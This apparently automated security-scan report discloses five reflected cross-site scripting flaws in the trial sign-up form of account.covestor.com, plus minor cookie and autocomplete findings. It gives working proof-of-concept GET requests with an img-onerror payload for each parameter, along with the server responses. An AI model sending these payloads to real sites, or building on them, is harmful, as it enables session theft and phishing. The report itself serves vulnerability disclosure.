XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, account.covestor.com

Report generated by XSS.CX at Thu Nov 10 10:29:36 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. https://account.covestor.com/mirroring-account/join-trial [email parameter]

1.2. https://account.covestor.com/mirroring-account/join-trial [emailconfirm parameter]

1.3. https://account.covestor.com/mirroring-account/join-trial [fname parameter]

1.4. https://account.covestor.com/mirroring-account/join-trial [lname parameter]

1.5. https://account.covestor.com/mirroring-account/join-trial [phone parameter]

2. Password field with autocomplete enabled

3. SSL cookie without secure flag set

3.1. https://account.covestor.com/mirroring-account/join-trial

3.2. https://account.covestor.com/mirroring-account/join-trial

4. Cookie scoped to parent domain

4.1. https://account.covestor.com/mirroring-account/join-trial

4.2. https://account.covestor.com/mirroring-account/join-trial

5. Cookie without HttpOnly flag set

5.1. https://account.covestor.com/mirroring-account/join-trial

5.2. https://account.covestor.com/mirroring-account/join-trial

6. Robots.txt file

7. Cacheable HTTPS response

8. SSL certificate



1. Cross-site scripting (reflected)  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://account.covestor.com/mirroring-account/join-trial [email parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c7f7"><img%20src%3da%20onerror%3dalert(1)>7c872bec941c194f was submitted in the email parameter. This input was echoed as 2c7f7"><img src=a onerror=alert(1)>7c872bec941c194f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mirroring-account/join-trial?email=2c7f7"><img%20src%3da%20onerror%3dalert(1)>7c872bec941c194f&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:45:11 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:11 GMT;path=/
Set-Cookie: C1320846311874=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D2c7f7%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3E7c872bec941c194f%26emailconfirm%3D%26password%3D%26fname%3D%26lname%3D%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:10 GMT;path=/
Expires: Wed, 09 Nov 2011 13:45:11 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24824


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...
<input type="text" id="trial-email" name="email" value="2c7f7"><img src=a onerror=alert(1)>7c872bec941c194f" />
...[SNIP]...

1.2. https://account.covestor.com/mirroring-account/join-trial [emailconfirm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The value of the emailconfirm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3472"><img%20src%3da%20onerror%3dalert(1)>a202322a5c425c4d5 was submitted in the emailconfirm parameter. This input was echoed as c3472"><img src=a onerror=alert(1)>a202322a5c425c4d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mirroring-account/join-trial?email=&emailconfirm=c3472"><img%20src%3da%20onerror%3dalert(1)>a202322a5c425c4d5&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:45:20 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:20 GMT;path=/
Set-Cookie: C1320846320696=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3Dc3472%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Ea202322a5c425c4d5%26password%3D%26fname%3D%26lname%3D%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:19 GMT;path=/
Expires: Wed, 09 Nov 2011 13:45:20 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=44
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...
<input type="text" id="trial-conf" name="emailconfirm" value="c3472"><img src=a onerror=alert(1)>a202322a5c425c4d5" />
...[SNIP]...

1.3. https://account.covestor.com/mirroring-account/join-trial [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949fc"><img%20src%3da%20onerror%3dalert(1)>ee1a89c396957db8c was submitted in the fname parameter. This input was echoed as 949fc"><img src=a onerror=alert(1)>ee1a89c396957db8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mirroring-account/join-trial?email=&emailconfirm=&password=&fname=949fc"><img%20src%3da%20onerror%3dalert(1)>ee1a89c396957db8c&lname=&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:45:32 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:32 GMT;path=/
Set-Cookie: C1320846332394=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3D%26password%3D%26fname%3D949fc%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Eee1a89c396957db8c%26lname%3D%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:31 GMT;path=/
Expires: Wed, 09 Nov 2011 13:45:32 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...
<input type="text" id="trial-fname" name="fname" value="949fc"><img src=a onerror=alert(1)>ee1a89c396957db8c" />
...[SNIP]...

1.4. https://account.covestor.com/mirroring-account/join-trial [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6cf"><img%20src%3da%20onerror%3dalert(1)>1701d5e91ffac6f2b was submitted in the lname parameter. This input was echoed as cd6cf"><img src=a onerror=alert(1)>1701d5e91ffac6f2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mirroring-account/join-trial?email=&emailconfirm=&password=&fname=&lname=cd6cf"><img%20src%3da%20onerror%3dalert(1)>1701d5e91ffac6f2b&phone=&terms=1&action=1&=Activate+Free+Trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:45:41 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:41 GMT;path=/
Set-Cookie: C1320846341266=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3D%26password%3D%26fname%3D%26lname%3Dcd6cf%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3E1701d5e91ffac6f2b%26phone%3D%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:40 GMT;path=/
Expires: Wed, 09 Nov 2011 13:45:41 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...
<input type="text" id="trial-lname" name="lname" value="cd6cf"><img src=a onerror=alert(1)>1701d5e91ffac6f2b" />
...[SNIP]...

1.5. https://account.covestor.com/mirroring-account/join-trial [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 824f1"><img%20src%3da%20onerror%3dalert(1)>b19090bd4aadf0e5a was submitted in the phone parameter. This input was echoed as 824f1"><img src=a onerror=alert(1)>b19090bd4aadf0e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mirroring-account/join-trial?email=&emailconfirm=&password=&fname=&lname=&phone=824f1"><img%20src%3da%20onerror%3dalert(1)>b19090bd4aadf0e5a&terms=1&action=1&=Activate+Free+Trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:45:50 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:45:50 GMT;path=/
Set-Cookie: C1320846350062=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial%3Femail%3D%26emailconfirm%3D%26password%3D%26fname%3D%26lname%3D%26phone%3D824f1%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Eb19090bd4aadf0e5a%26terms%3D1%26action%3D1%26%3DActivate%2BFree%2BTrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:50:49 GMT;path=/
Expires: Wed, 09 Nov 2011 13:45:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=63
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...
<input type="text" id="trial-tel" name="phone" value="824f1"><img src=a onerror=alert(1)>b19090bd4aadf0e5a" />
...[SNIP]...

2. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://covestor.com/
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:41:03 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/
Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/
Expires: Wed, 09 Nov 2011 13:41:03 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...
</big>
                           <form name="trial-signup" action="" method="post">
                            <fieldset>
...[SNIP]...
</label>
                               <input type="password" id="trial-pass" name="password" value="" />
                               <script>
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://account.covestor.com/mirroring-account/join-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://covestor.com/
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:41:03 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/
Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/
Expires: Wed, 09 Nov 2011 13:41:03 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

3.2. https://account.covestor.com/mirroring-account/join-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

email=&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:44:50 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:44:50 GMT;path=/
Set-Cookie: C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/
Expires: Wed, 09 Nov 2011 13:44:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

4. Cookie scoped to parent domain  previous  next
There are 2 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


4.1. https://account.covestor.com/mirroring-account/join-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://covestor.com/
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:41:03 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/
Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/
Expires: Wed, 09 Nov 2011 13:41:03 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

4.2. https://account.covestor.com/mirroring-account/join-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

